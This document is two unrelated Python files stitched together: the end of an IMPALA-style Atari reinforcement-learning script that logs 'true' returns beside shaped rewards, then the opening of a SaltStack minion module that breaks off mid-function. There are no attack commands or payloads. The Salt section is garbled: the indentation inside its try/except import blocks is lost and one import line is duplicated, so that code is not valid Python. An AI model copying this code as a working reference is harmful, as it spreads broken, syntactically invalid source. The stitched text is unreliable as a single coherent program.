        vtrace_returns = vtrace.from_logits(
            behavior_policy_logits=batch["policy_logits"],
            target_policy_logits=learner_outputs["policy_logits"],
            actions=batch["action"],
            discounts=discounts,
            rewards=clipped_rewards,
            values=learner_outputs["baseline"],
            bootstrap_value=bootstrap_value,
        )

        pg_loss = compute_policy_gradient_loss(
            learner_outputs["policy_logits"],
            batch["action"],
            vtrace_returns.pg_advantages,
        )
        baseline_loss = flags.baseline_cost * compute_baseline_loss(
            vtrace_returns.vs - learner_outputs["baseline"]
        )
        entropy_loss = flags.entropy_cost * compute_entropy_loss(
            learner_outputs["policy_logits"]
        )

        total_loss = pg_loss + baseline_loss + entropy_loss

        # Episode-level stats: pick out the steps where an episode finished.
        episode_returns = batch["episode_return"][batch["done"]]
        episode_true_returns = batch["episode_true_return"][batch["done"]]
        episode_true_move = batch["episode_true_move"][batch["done"]]
        stats = {
            "episode_returns": tuple(episode_returns.cpu().numpy()),
            "episode_true_returns": tuple(episode_true_returns.cpu().numpy()),
            "episode_true_move": tuple(episode_true_move.cpu().numpy()),
            "mean_episode_return": torch.mean(episode_returns).item(),
            "mean_episode_true_return": torch.mean(episode_true_returns).item(),
            "mean_episode_true_move": torch.mean(episode_true_move).item(),
            "total_loss": total_loss.item(),
            "pg_loss": pg_loss.item(),
            "baseline_loss": baseline_loss.item(),
            "entropy_loss": entropy_loss.item(),
        }

        optimizer.zero_grad()
        total_loss.backward()
        nn.utils.clip_grad_norm_(model.parameters(), flags.grad_norm_clipping)
        optimizer.step()
        scheduler.step()

        # Publish updated weights to the shared-memory actor model.
        actor_model.load_state_dict(model.state_dict())
        return stats
def create_buffers(flags, obs_shape, num_actions) -> Buffers:
    """Allocate flags.num_buffers shared-memory rollout slots.

    Each field holds T+1 steps per slot: slot index 0 carries the previous
    rollout's final step (see act()).
    """
    T = flags.unroll_length
    specs = dict(
        frame=dict(size=(T + 1, *obs_shape), dtype=torch.uint8),
        reward=dict(size=(T + 1,), dtype=torch.float32),
        true_reward=dict(size=(T + 1,), dtype=torch.float32),
        true_move=dict(size=(T + 1,), dtype=torch.float32),
        done=dict(size=(T + 1,), dtype=torch.bool),
        episode_return=dict(size=(T + 1,), dtype=torch.float32),
        episode_true_return=dict(size=(T + 1,), dtype=torch.float32),
        episode_true_move=dict(size=(T + 1,), dtype=torch.float32),
        episode_step=dict(size=(T + 1,), dtype=torch.int32),
        policy_logits=dict(size=(T + 1, num_actions), dtype=torch.float32),
        baseline=dict(size=(T + 1,), dtype=torch.float32),
        last_action=dict(size=(T + 1,), dtype=torch.int64),
        action=dict(size=(T + 1,), dtype=torch.int64),
    )
    return {
        key: [
            torch.empty(**spec).share_memory_()
            for _ in range(flags.num_buffers)
        ]
        for key, spec in specs.items()
    }
def train(flags):  # pylint: disable=too-many-branches, too-many-statements
    """IMPALA-style training loop.

    Spawns flags.num_actors actor processes that fill shared-memory rollout
    buffers, runs flags.num_learner_threads learner threads that consume
    them, and keeps the main thread as a monitor that logs throughput and
    checkpoints every 10 minutes.
    """
    if flags.xpid is None:
        flags.xpid = "torchbeast-%s" % time.strftime("%Y%m%d-%H%M%S")
    plogger = file_writer.FileWriter(
        xpid=flags.xpid, xp_args=flags.__dict__, rootdir=flags.savedir
    )
    checkpointpath = os.path.expandvars(
        os.path.expanduser("%s/%s/%s" % (flags.savedir, flags.xpid, "model.tar"))
    )

    if flags.num_buffers is None:  # Set sensible default for num_buffers.
        flags.num_buffers = max(2 * flags.num_actors, flags.batch_size)
    if flags.num_actors >= flags.num_buffers:
        raise ValueError("num_buffers should be larger than num_actors")
    if flags.num_buffers < flags.batch_size:
        raise ValueError("num_buffers should be larger than batch_size")

    T = flags.unroll_length
    B = flags.batch_size

    flags.device = None
    if not flags.disable_cuda and torch.cuda.is_available():
        logging.info("Using CUDA.")
        flags.device = torch.device("cuda")
    else:
        logging.info("Not using CUDA.")
        flags.device = torch.device("cpu")

    if flags.pretrained:
        env = create_env_seaquest(flags)
    else:
        env = create_env(flags)

    # Actor model lives in shared memory; FNet when a pretrained featurizer
    # checkpoint is provided, plain Net otherwise.
    if flags.pretrained:
        model = FNet(env.observation_space.shape, env.action_space.n, num_layers=flags.num_layers, hidden_size=flags.hidden_size, use_lstm=flags.use_lstm)
        model.load_my_state_dict(torch.load(flags.pretrained))
    else:
        model = Net(env.observation_space.shape, env.action_space.n, num_layers=flags.num_layers, hidden_size=flags.hidden_size, use_lstm=flags.use_lstm)
    buffers = create_buffers(flags, env.observation_space.shape, model.num_actions)

    model.share_memory()

    # Add initial RNN state.
    initial_agent_state_buffers = []
    for _ in range(flags.num_buffers):
        state = model.initial_state(batch_size=1)
        for t in state:
            t.share_memory_()
        initial_agent_state_buffers.append(state)

    actor_processes = []
    ctx = mp.get_context("fork")
    free_queue = ctx.SimpleQueue()
    full_queue = ctx.SimpleQueue()

    for i in range(flags.num_actors):
        actor = ctx.Process(
            target=act,
            args=(
                flags,
                i,
                free_queue,
                full_queue,
                model,
                buffers,
                initial_agent_state_buffers,
            ),
        )
        actor.start()
        actor_processes.append(actor)

    # Separate learner copy of the model on the training device.
    if flags.pretrained:
        learner_model = FNet(
            env.observation_space.shape, env.action_space.n, num_layers=flags.num_layers, hidden_size=flags.hidden_size, use_lstm=flags.use_lstm
        ).to(device=flags.device)
        learner_model.load_my_state_dict(torch.load(flags.pretrained))
    else:
        learner_model = Net(
            env.observation_space.shape, env.action_space.n, num_layers=flags.num_layers, hidden_size=flags.hidden_size, use_lstm=flags.use_lstm
        ).to(device=flags.device)

    optimizer = torch.optim.RMSprop(
        learner_model.parameters(),
        lr=flags.learning_rate,
        momentum=flags.momentum,
        eps=flags.epsilon,
        alpha=flags.alpha,
    )
    # optimizer = torch.optim.Adam(
    #     learner_model.parameters(),
    #     lr=flags.learning_rate,
    # )

    # LR schedules; `epoch` here is the number of learner steps taken.
    def lr_lambda(epoch):
        # Linear decay to zero over flags.total_steps environment steps.
        return 1 - min(epoch * T * B, flags.total_steps) / flags.total_steps

    def drop_lambda(epoch):
        left = 1 - min(epoch * T * B, flags.total_steps) / flags.total_steps
        return 2 ** (-5 + (left * 10) // 2)

    def staggered_drop_lambda(epoch):
        # Step-wise halvings keyed to fixed fractions of a 100M-step budget,
        # independent of flags.total_steps.
        TOTAL = 100_000_000
        left = 1 - min(epoch * T * B, TOTAL) / TOTAL
        if left > 0.9:
            return 2 ** -1
        if left > 0.7:
            return 2 ** -2
        if left > 0.5:
            return 2 ** -3
        if left > 0.3:
            return 2 ** -4
        return 2 ** -5 * (left/0.3)

    scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, staggered_drop_lambda)

    logger = logging.getLogger("logfile")
    stat_keys = [
        "total_loss",
        "mean_episode_return",
        "mean_episode_true_return",
        "mean_episode_true_move",
        "pg_loss",
        "baseline_loss",
        "entropy_loss",
    ]
    logger.info("# Step\t%s", "\t".join(stat_keys))

    # Shared across learner threads via `nonlocal` below.
    step, stats = 0, {}

    def batch_and_learn(i, lock=threading.Lock()):
        """Thread target for the learning process."""
        nonlocal step, stats
        timings = prof.Timings()
        while step < flags.total_steps:
            timings.reset()
            batch, agent_state = get_batch(
                flags,
                free_queue,
                full_queue,
                buffers,
                initial_agent_state_buffers,
                timings,
            )
            stats = learn(
                flags, model, learner_model, batch, agent_state, optimizer, scheduler
            )
            timings.time("learn")
            with lock:
                to_log = dict(step=step)
                to_log.update({k: stats[k] for k in stat_keys})
                plogger.log(to_log)
                step += T * B

        if i == 0:
            logging.info("Batch and learn: %s", timings.summary())

    # Seed the free queue with every buffer slot.
    for m in range(flags.num_buffers):
        free_queue.put(m)

    threads = []
    for i in range(flags.num_learner_threads):
        thread = threading.Thread(
            target=batch_and_learn, name="batch-and-learn-%d" % i, args=(i,)
        )
        thread.start()
        threads.append(thread)

    def checkpoint():
        if flags.disable_checkpoint:
            return
        logging.info("Saving checkpoint to %s", checkpointpath)
        torch.save(
            {
                "model_state_dict": model.state_dict(),
                "optimizer_state_dict": optimizer.state_dict(),
                "scheduler_state_dict": scheduler.state_dict(),
                "flags": vars(flags),
            },
            checkpointpath,
        )

    #wandb.init(project="test-space", entity="aypan17", group="atari")
    timer = timeit.default_timer
    try:
        last_checkpoint_time = timer()
        while step < flags.total_steps:
            start_step = step
            start_time = timer()
            time.sleep(5)

            if timer() - last_checkpoint_time > 10 * 60:  # Save every 10 min.
                checkpoint()
                last_checkpoint_time = timer()

            sps = (step - start_step) / (timer() - start_time)
            if stats.get("episode_returns", None):
                mean_return = (
                    "Return per episode: %.1f. " % stats["mean_episode_return"]
                )
            else:
                mean_return = ""
            if stats.get("episode_true_returns", None):
                mean_true_return = (
                    "True return per episode: %.1f. " % stats["mean_episode_true_return"]
                )
            else:
                mean_true_return = ""
            if stats.get("episode_true_move", None):
                mean_true_move = (
                    "True move per episode: %.1f. " % stats["mean_episode_true_move"]
                )
            else:
                mean_true_move = ""
            total_loss = stats.get("total_loss", float("inf"))
            #if stats.get("episode_returns", None) and stats.get("true_episode_returns", None):
                #wandb.log({"loss":total_loss, "episode_return": stats["mean_episode_return"], "true_episode_return": stats["mean_episode_true_return"]})
            logging.info(
                "Steps %i @ %.1f SPS. Loss %f. %s%s%sStats:\n%s",
                step,
                sps,
                total_loss,
                mean_return,
                mean_true_return,
                mean_true_move,
                pprint.pformat(stats),
            )
    except KeyboardInterrupt:
        return  # Try joining actors then quit.
    else:
        for thread in threads:
            thread.join()
        logging.info("Learning finished after %d steps.", step)
    finally:
        # None is the shutdown signal for every actor (see act()).
        for _ in range(flags.num_actors):
            free_queue.put(None)
        for actor in actor_processes:
            actor.join(timeout=1)
        checkpoint()
        plogger.close()
def evaluate(flags, num_episodes: int = 4):
    """Run test() on every qualifying experiment folder under flags.savedir.

    A folder qualifies when its underscore-separated name has at least three
    parts, contains "staggered" or "pacifist", and ends with
    ..._<hidden_size>_<num_layers>.
    """
    for folder in os.listdir(flags.savedir):
        if not os.path.isdir(os.path.join(flags.savedir, folder)):
            continue
        params = folder.split("_")
        if len(params) < 3:
            continue
        if "staggered" not in params and "pacifist" not in params:
            continue
        test(
            flags,
            num_episodes=num_episodes,
            folder=folder,
            num_layers=int(params[-1]),
            hidden_size=int(params[-2]),
        )
def test(flags, num_episodes: int = 4, folder = None, num_layers = None, hidden_size = None):
    """Evaluate a saved checkpoint.

    Runs 15 measurement batches of `num_episodes` episodes each, logs
    aggregate return statistics, and writes the raw numbers plus the FC
    trunk's parameter count to a JSON file under flags.savedir.

    Args:
        flags: parsed command-line flags.
        num_episodes: episodes per measurement batch.
        folder: experiment folder under flags.savedir; defaults to flags.xpid.
        num_layers / hidden_size: architecture of the saved model; required
            when `folder` is given, otherwise taken from flags.
    """
    if folder is not None:
        assert num_layers is not None
        assert hidden_size is not None
    elif flags.xpid is None:
        # FIX: was `assert False` followed by dead code; raise explicitly so
        # the check survives `python -O` (same exception type as before).
        raise AssertionError("either `folder` or flags.xpid must be provided")
    else:
        folder = flags.xpid
        num_layers = flags.num_layers
        hidden_size = flags.hidden_size
    checkpointpath = os.path.expandvars(
        os.path.expanduser("%s/%s/%s" % (flags.savedir, folder, "model.tar"))
    )
    if flags.pretrained:
        gym_env = create_env_seaquest(flags)
        env = environment.Environment(gym_env)
        model = FNet(gym_env.observation_space.shape, gym_env.action_space.n, num_layers=num_layers, hidden_size=hidden_size, use_lstm=flags.use_lstm)
    else:
        gym_env = create_env(flags)
        env = environment.Environment(gym_env)
        model = Net(gym_env.observation_space.shape, gym_env.action_space.n, num_layers=num_layers, hidden_size=hidden_size, use_lstm=flags.use_lstm)
    env._max_episode_steps = 10
    model.eval()
    # Parameter count of the fully connected trunk (reported in the JSON).
    p = sum(p.numel() for p in model.fc.parameters())
    try:
        checkpoint = torch.load(checkpointpath, map_location="cpu")
        model.load_state_dict(checkpoint["model_state_dict"])
    except Exception:
        # FIX: was a bare `except:`, which also swallowed KeyboardInterrupt
        # and SystemExit. Best-effort skip of unloadable models is preserved.
        print(f"Model of width {hidden_size} and depth {num_layers} failed to load")
        return

    returns = []
    true_returns = []
    true_move = []
    lens = []
    for _ in range(15):  # 15 independent measurement batches
        tmp_ret = []
        tmp_true = []
        tmp_move = []
        tmp_lens = []
        observation = env.initial()
        agent_state = model.initial_state(batch_size=1)
        while len(tmp_ret) < num_episodes:
            if flags.mode == "test_render":
                env.gym_env.render()
            agent_outputs = model(observation, agent_state)
            policy_outputs, agent_state = agent_outputs
            observation = env.step(policy_outputs["action"])
            if observation["done"].item():
                tmp_ret.append(observation["episode_return"].item())
                tmp_true.append(observation["episode_true_return"].item())
                tmp_move.append(observation["episode_true_move"].item())
                tmp_lens.append(observation["episode_step"].item())
        logging.info(str(tmp_lens))
        returns.append(sum(tmp_ret))
        true_returns.append(sum(tmp_true))
        true_move.append(sum(tmp_move))
        lens.append(sum(tmp_lens))
    env.close()

    lens = np.array(lens)
    returns = np.array(returns)
    true_returns = np.array(true_returns)
    true_move = np.array(true_move)
    return_per_step = returns / lens
    true_return_per_step = true_returns / lens
    logging.info(
        "Average returns over %i episodes: %.1f +/- %.1f", num_episodes, np.mean(returns).item(), np.std(returns).item()
    )
    logging.info(
        "Average true returns over %i episodes: %.1f +/- %.1f", num_episodes, np.mean(true_returns).item(), np.std(true_returns).item()
    )
    logging.info(
        "Average true move over %i episodes: %.1f +/- %.1f", num_episodes, np.mean(true_move).item(), np.std(true_move).item()
    )
    logging.info(
        "Average return/step over %i episodes: %.1f +/- %.1f", num_episodes, np.mean(return_per_step).item(), np.std(return_per_step).item()
    )
    logging.info(
        "Average true return/step over %i episodes: %.1f +/- %.1f", num_episodes, np.mean(true_return_per_step).item(), np.std(true_return_per_step).item()
    )
    logging.info(
        "Average num steps over %i episodes: %.1f +/- %.1f", num_episodes, np.mean(lens).item(), np.std(lens).item()
    )

    # FIX: str(flags.xpid) avoids a TypeError when test() is reached via
    # evaluate() with no --xpid set; also use a context manager for the file.
    out_path = os.path.join(flags.savedir, folder + "_" + str(flags.xpid) + ".json")
    with open(out_path, "w") as f:
        json.dump({'params': [p], 'rew': returns.tolist(), 'true_rew': true_returns.tolist(), 'true_move': true_move.tolist(),
                   'rew_step': return_per_step.tolist(), 'true_rew_step': true_return_per_step.tolist(), 'len': lens.tolist()}, f)
class FeaturizedAtariNet(nn.Module):
    """Policy/value network whose conv featurizer is meant to be initialized
    from a pretrained checkpoint (see load_my_state_dict).

    Always feed-forward: `use_lstm` is accepted only for signature
    compatibility with AtariNet and is ignored. forward() returns the same
    (dict, core_state) contract as AtariNet.
    """

    def __init__(self, observation_shape, num_actions, num_layers=1, hidden_size=512, use_lstm=False):
        super(FeaturizedAtariNet, self).__init__()
        self.observation_shape = observation_shape
        self.num_actions = num_actions

        # Feature extraction: four conv + max-pool stages.
        self.conv1 = nn.Conv2d(self.observation_shape[0], 32, 5, stride=1, padding=2)
        self.maxp1 = nn.MaxPool2d(2, 2)
        self.conv2 = nn.Conv2d(32, 32, 5, stride=1, padding=1)
        self.maxp2 = nn.MaxPool2d(2, 2)
        self.conv3 = nn.Conv2d(32, 64, 4, stride=1, padding=1)
        self.maxp3 = nn.MaxPool2d(2, 2)
        self.conv4 = nn.Conv2d(64, 64, 3, stride=1, padding=1)
        self.maxp4 = nn.MaxPool2d(2, 2)

        # Fully connected trunk. BUG FIX: the original used list
        # multiplication ([nn.Linear(h, h)] * (num_layers - 1)), which
        # repeats the SAME module object, so all hidden layers shared one
        # weight matrix. Build distinct layers with a comprehension, exactly
        # as AtariNet does. 1024 = 64 * 4 * 4 for 84x84 inputs.
        self.fc = nn.ModuleList(
            [nn.Linear(1024, hidden_size)]
            + [nn.Linear(hidden_size, hidden_size) for _ in range(num_layers - 1)]
        )

        # FC output size + one-hot of last action + last reward.
        core_output_size = hidden_size + num_actions + 1

        self.policy = nn.Linear(core_output_size, self.num_actions)
        self.baseline = nn.Linear(core_output_size, 1)

    def initial_state(self, batch_size):
        # Feed-forward network: no recurrent state to carry.
        return tuple()

    def forward(self, inputs, core_state=()):
        x = inputs["frame"]  # [T, B, C, H, W].
        T, B, *_ = x.shape
        # NOTE(review): frames are used unnormalized (no /255), unlike
        # AtariNet — presumably matching how the featurizer was pretrained;
        # confirm against the featurizer training code.
        x = torch.flatten(x, 0, 1).float()  # Merge time and batch.
        x = F.relu(self.maxp1(self.conv1(x)))
        x = F.relu(self.maxp2(self.conv2(x)))
        x = F.relu(self.maxp3(self.conv3(x)))
        x = F.relu(self.maxp4(self.conv4(x)))
        x = x.view(T * B, -1)
        for layer in self.fc:
            x = F.relu(layer(x))

        one_hot_last_action = F.one_hot(
            inputs["last_action"].view(T * B), self.num_actions
        ).float()
        clipped_reward = torch.clamp(inputs["reward"], -1, 1).view(T * B, 1)
        core_input = torch.cat([x, clipped_reward, one_hot_last_action], dim=-1)

        core_output = core_input
        core_state = tuple()

        policy_logits = self.policy(core_output)
        baseline = self.baseline(core_output)

        if self.training:
            action = torch.multinomial(F.softmax(policy_logits, dim=1), num_samples=1)
        else:
            # Don't sample when testing.
            action = torch.argmax(policy_logits, dim=1)

        policy_logits = policy_logits.view(T, B, self.num_actions)
        baseline = baseline.view(T, B)
        action = action.view(T, B)

        return (
            dict(policy_logits=policy_logits, baseline=baseline, action=action),
            core_state,
        )

    def load_my_state_dict(self, state_dict):
        """Copy only the parameters whose names exist in this model — used to
        load a pretrained featurizer checkpoint with extra/missing keys."""
        own_state = self.state_dict()
        for name, param in state_dict.items():
            if name not in own_state:
                continue
            own_state[name].copy_(param)
class AtariNet(nn.Module):
    """Standard conv policy/value network: three conv layers, an MLP trunk,
    an optional 2-layer LSTM core, and separate policy/baseline heads."""

    def __init__(self, observation_shape, num_actions, num_layers=1, hidden_size=512, use_lstm=False):
        super(AtariNet, self).__init__()
        self.observation_shape = observation_shape
        self.num_actions = num_actions

        # Feature extraction.
        self.conv1 = nn.Conv2d(
            in_channels=self.observation_shape[0],
            out_channels=32,
            kernel_size=8,
            stride=4,
        )
        self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)
        self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)

        # Fully connected layer(s). 3136 = 64 * 7 * 7 for 84x84 input frames.
        self.fc = nn.ModuleList([nn.Linear(3136, hidden_size)] + [nn.Linear(hidden_size, hidden_size) for _ in range(num_layers-1)])

        # FC output size + one-hot of last action + last reward.
        core_output_size = hidden_size + num_actions + 1

        self.use_lstm = use_lstm
        if use_lstm:
            self.core = nn.LSTM(core_output_size, core_output_size, 2)

        self.policy = nn.Linear(core_output_size, self.num_actions)
        self.baseline = nn.Linear(core_output_size, 1)

    def initial_state(self, batch_size):
        # Empty tuple when feed-forward; zeroed (h0, c0) when using the LSTM.
        if not self.use_lstm:
            return tuple()
        return tuple(
            torch.zeros(self.core.num_layers, batch_size, self.core.hidden_size)
            for _ in range(2)
        )

    def forward(self, inputs, core_state=()):
        x = inputs["frame"]  # [T, B, C, H, W].
        T, B, *_ = x.shape
        x = torch.flatten(x, 0, 1)  # Merge time and batch.
        x = x.float() / 255.0  # uint8 pixels -> [0, 1]
        x = F.relu(self.conv1(x))
        x = F.relu(self.conv2(x))
        x = F.relu(self.conv3(x))
        x = x.view(T * B, -1)
        for layer in self.fc:
            x = F.relu(layer(x))

        one_hot_last_action = F.one_hot(
            inputs["last_action"].view(T * B), self.num_actions
        ).float()
        clipped_reward = torch.clamp(inputs["reward"], -1, 1).view(T * B, 1)
        core_input = torch.cat([x, clipped_reward, one_hot_last_action], dim=-1)

        if self.use_lstm:
            # Unroll the LSTM one step at a time so the hidden state can be
            # zeroed at episode boundaries.
            core_input = core_input.view(T, B, -1)
            core_output_list = []
            notdone = (~inputs["done"]).float()
            for input, nd in zip(core_input.unbind(), notdone.unbind()):
                # Reset core state to zero whenever an episode ended.
                # Make `done` broadcastable with (num_layers, B, hidden_size)
                # states:
                nd = nd.view(1, -1, 1)
                core_state = tuple(nd * s for s in core_state)
                output, core_state = self.core(input.unsqueeze(0), core_state)
                core_output_list.append(output)
            core_output = torch.flatten(torch.cat(core_output_list), 0, 1)
        else:
            core_output = core_input
            core_state = tuple()

        policy_logits = self.policy(core_output)
        baseline = self.baseline(core_output)

        if self.training:
            action = torch.multinomial(F.softmax(policy_logits, dim=1), num_samples=1)
        else:
            # Don't sample when testing.
            action = torch.argmax(policy_logits, dim=1)

        policy_logits = policy_logits.view(T, B, self.num_actions)
        baseline = baseline.view(T, B)
        action = action.view(T, B)

        return (
            dict(policy_logits=policy_logits, baseline=baseline, action=action),
            core_state,
        )
# Short aliases used throughout this file: Net is the standard architecture,
# FNet the variant initialized from a pretrained featurizer checkpoint.
Net = AtariNet
FNet = FeaturizedAtariNet
def create_env(flags):
    """Build the standard (frame-stacked) Atari env with this fork's
    reward-shaping knobs applied, wrapped for PyTorch tensor layout."""
    wrapped = atari_wrappers.wrap_deepmind(
        atari_wrappers.make_atari(flags.env),
        clip_rewards=False,
        frame_stack=True,
        scale=False,
        fuel_multiplier=flags.fuel_multiplier,
        move_penalty=flags.move_penalty,
        true_move_penalty=flags.true_move_penalty,
    )
    return atari_wrappers.wrap_pytorch(wrapped)
def create_env_seaquest(flags):
    """Same as create_env but WITHOUT frame stacking — used with the
    pretrained-featurizer (FNet) model path."""
    wrapped = atari_wrappers.wrap_deepmind(
        atari_wrappers.make_atari(flags.env),
        clip_rewards=False,
        frame_stack=False,
        scale=False,
        fuel_multiplier=flags.fuel_multiplier,
        move_penalty=flags.move_penalty,
        true_move_penalty=flags.true_move_penalty,
    )
    return atari_wrappers.wrap_pytorch(wrapped)
def main(flags):
    """Dispatch on --mode: train, eval (sweep of folders), or single test."""
    if flags.mode == "train":
        train(flags)
        return
    if flags.mode == "eval":
        evaluate(flags, num_episodes=flags.num_episodes)
        return
    # "test" and "test_render" both go through test(); the render flag is
    # read inside test() itself.
    test(flags, num_episodes=flags.num_episodes)
if __name__ == "__main__":
    # Parse CLI flags and run the selected mode.
    flags = parser.parse_args()
    main(flags)
|
minion.py | # -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function
import os
import re
import sys
import copy
import time
import errno
import types
import signal
import fnmatch
import hashlib
import logging
import threading
import traceback
import multiprocessing
from random import randint, shuffle
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
from salt.ext.six.moves import range
# pylint: enable=no-name-in-module,redefined-builtin
from stat import S_IMODE
from stat import S_IMODE
# Import third party libs
try:
import zmq
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minion
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.exceptions import (
AuthenticationError, CommandExecutionError, CommandNotFoundError,
SaltInvocationError, SaltReqTimeoutError, SaltClientError,
SaltSystemExit, SaltSyndicMasterError
)
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts):
    '''
    Resolve the master hostname in ``opts['master']`` and build the
    master URI.

    Returns a dict with:
        master_ip:  resolved address ('127.0.0.1' for purely local
                    setups, or when DNS fails and retry_dns is disabled)
        master_uri: 'tcp://<master_ip>:<master_port>'
    '''
    ret = {}
    check_dns = True
    # Purely local minions (local file_client and not forced to use a
    # master) never need to resolve a master address.
    if (opts.get('file_client', 'remote') == 'local' and
            not opts.get('use_master_when_local', False)):
        check_dns = False
    if check_dns is True:
        # Because I import salt.log below I need to re-import salt.utils here
        import salt.utils
        try:
            ret['master_ip'] = \
                salt.utils.dns_check(opts['master'], True, opts['ipv6'])
        except SaltClientError:
            # DNS lookup failed; optionally keep retrying every
            # retry_dns seconds until the master resolves.
            if opts['retry_dns']:
                while True:
                    import salt.log
                    msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
                           'seconds').format(opts['master'], opts['retry_dns'])
                    if salt.log.is_console_configured():
                        log.error(msg)
                    else:
                        print('WARNING: {0}'.format(msg))
                    time.sleep(opts['retry_dns'])
                    try:
                        ret['master_ip'] = salt.utils.dns_check(
                            opts['master'], True, opts['ipv6']
                        )
                        break
                    except SaltClientError:
                        pass
            else:
                # Retries disabled: fall back to loopback.
                ret['master_ip'] = '127.0.0.1'
        except SaltSystemExit:
            err = 'Master address: {0} could not be resolved. Invalid or unresolveable address.'.format(
                opts.get('master', 'Unknown'))
            log.error(err)
            raise SaltSystemExit(code=42, msg=err)
    else:
        ret['master_ip'] = '127.0.0.1'
    # Warn when the resolved address differs from a previously known one.
    if 'master_ip' in ret and 'master_ip' in opts:
        if ret['master_ip'] != opts['master_ip']:
            log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
                                                                           ret['master_ip'])
                        )
    ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
                                                   port=opts['master_port'])
    return ret
def get_proc_dir(cachedir, **kwargs):
    '''
    Return the process-data directory (``<cachedir>/proc``), creating it
    if it does not exist.

    Optional keyword arguments:
        mode: permission bits, passed to os.makedirs on creation and
            enforced via os.chmod if the directory already exists with
            different bits.
        uid / gid: ownership to apply (unix-like systems only).  A value
            of -1 (or an omitted value) means "leave unchanged"; no call
            is made when the directory already has the requested owner.
    '''
    proc_dir = os.path.join(cachedir, 'proc')
    requested_mode = kwargs.pop('mode', None)
    mode_kwargs = {} if requested_mode is None else {'mode': requested_mode}
    if not os.path.isdir(proc_dir):
        # Not present yet: create it, honoring an explicit mode if given.
        os.makedirs(proc_dir, **mode_kwargs)
    stat_info = os.stat(proc_dir)
    if mode_kwargs:
        # An explicit mode was requested; fix up the permission bits when
        # they differ from what is on disk.
        current_bits = S_IMODE(stat_info.st_mode)
        wanted_bits = mode_kwargs['mode']
        if current_bits != wanted_bits:
            os.chmod(proc_dir, (stat_info.st_mode ^ current_bits) | wanted_bits)
    if hasattr(os, 'chown'):
        # Ownership changes only work on unix/unix-like systems.
        uid = kwargs.pop('uid', -1)
        gid = kwargs.pop('gid', -1)
        ownership_requested = any(i != -1 for i in (uid, gid))
        if ownership_requested and (stat_info.st_uid != uid or
                                    stat_info.st_gid != gid):
            os.chown(proc_dir, uid, gid)
    return proc_dir
def parse_args_and_kwargs(func, args, data=None):
    '''
    Deprecated wrapper around load_args_and_kwargs; emits a Boron
    deprecation warning and delegates unchanged.
    '''
    deprecation_notice = (
        'salt.minion.parse_args_and_kwargs() has been renamed to '
        'salt.minion.load_args_and_kwargs(). Please change this function call '
        'before the Boron release of Salt.'
    )
    salt.utils.warn_until('Boron', deprecation_notice)
    return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None):
    '''
    Detect the args and kwargs that need to be passed to a function call,
    and check them against what was passed.

    func -- the function that will eventually be called; its argspec
        decides which keyword names are accepted.
    args -- raw argument list from the publish payload.  String entries
        are parsed for ``key=value`` kwargs; dicts carrying a truthy
        ``__kwarg__`` marker are treated as pre-parsed kwargs; anything
        else is a positional argument.
    data -- optional publish data; when the function accepts ``**kwargs``
        each item is injected as ``__pub_<key>``.

    Returns an ``(_args, _kwargs)`` tuple.
    Raises SaltInvocationError when kwargs are passed that the function
    does not accept.
    '''
    argspec = salt.utils.args.get_function_argspec(func)
    _args = []
    _kwargs = {}
    invalid_kwargs = []
    for arg in args:
        if isinstance(arg, six.string_types):
            string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False)  # pylint: disable=W0632
            if string_arg:
                # Don't append the version that was just derived from parse_cli
                # above, that would result in a 2nd call to
                # salt.utils.cli.yamlify_arg(), which could mangle the input.
                _args.append(arg)
            elif string_kwarg:
                salt.utils.warn_until(
                    'Boron',
                    'The list of function args and kwargs should be parsed '
                    'by salt.utils.args.parse_input() before calling '
                    'salt.minion.load_args_and_kwargs().'
                )
                if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
                    # Function supports **kwargs or is a positional argument to
                    # the function.
                    _kwargs.update(string_kwarg)
                else:
                    # **kwargs not in argspec and parsed argument name not in
                    # list of positional arguments. This keyword argument is
                    # invalid.
                    # BUG FIX: was the Python-2-only dict.iteritems(); use
                    # six.iteritems() as everywhere else in this function so
                    # the error path also works on Python 3.
                    for key, val in six.iteritems(string_kwarg):
                        invalid_kwargs.append('{0}={1}'.format(key, val))
                continue
        # if the arg is a dict with __kwarg__ == True, then its a kwarg
        elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
            for key, val in six.iteritems(arg):
                if argspec.keywords or key in argspec.args:
                    # Function supports **kwargs or is a positional argument to
                    # the function.
                    _kwargs[key] = val
                else:
                    # **kwargs not in argspec and parsed argument name not in
                    # list of positional arguments. This keyword argument is
                    # invalid.
                    invalid_kwargs.append('{0}={1}'.format(key, val))
            continue
        else:
            _args.append(arg)
    if invalid_kwargs:
        raise SaltInvocationError(
            'The following keyword arguments are not valid: {0}'
            .format(', '.join(invalid_kwargs))
        )
    if argspec.keywords and isinstance(data, dict):
